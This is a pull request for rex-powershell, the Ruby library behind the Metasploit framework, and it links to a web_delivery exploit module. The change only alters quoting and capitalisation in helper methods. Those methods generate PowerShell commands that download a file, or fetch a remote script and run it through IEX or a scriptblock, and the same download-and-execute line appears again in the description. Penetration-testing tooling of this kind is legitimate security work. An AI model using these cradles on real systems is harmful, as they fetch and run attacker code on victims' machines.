### PR TITLE
Double quotes to single quotes to match

### DIFF
--- a/lib/rex/powershell/psh_methods.rb
+++ b/lib/rex/powershell/psh_methods.rb
@@ -16,7 +16,7 @@ module Powershell
     # @return [String] Powershell code to download a file
     def self.download(src, target)
       target ||= '$pwd\\' << src.split('/').last
-      %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
+      %Q^(new-object System.Net.WebClient).DownloadFile('#{src}', '#{target}')^
     end
 
     #
@@ -82,9 +82,9 @@ module Powershell
     # @return [String] PowerShell code to download and exec the url
     def self.download_and_exec_string(url, iex = true)
       if iex
-        %Q^ IEX ((new-object net.webclient).downloadstring('#{url}'))^
+        %Q^IEX ((new-object Net.WebClient).DownloadString('#{url}'))^
       else
-        %Q^&([scriptblock]::create((new-object net.webclient).downloadstring('#{url}')))^
+        %Q^&([scriptblock]::create((new-object Net.WebClient).DownloadString('#{url}')))^
       end
     end
 


### PR DESCRIPTION
- The URL parameter for `DownloadString` is single quotes.
- The URL parameter for `DownloadFile` is double quotes.
This caused an issue for https://github.com/rapid7/metasploit-framework/pull/8933 (https://github.com/g0tmi1k/metasploit-framework/blob/ad70968579df060fb042af0b757e4d62fe80a9c3/modules/exploits/multi/script/web_delivery.rb#L167)

** DownloadFile** _(Double Quotes)_
- `%Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^` (https://github.com/rapid7/rex-powershell/blob/master/lib/rex/powershell/psh_methods.rb#L85)

** DownloadString** _(Single Quotes)_
- `%Q^ IEX ((new-object net.webclient).downloadstring('#{url}'))^` (https://github.com/rapid7/rex-powershell/blob/master/lib/rex/powershell/psh_methods.rb#L19)

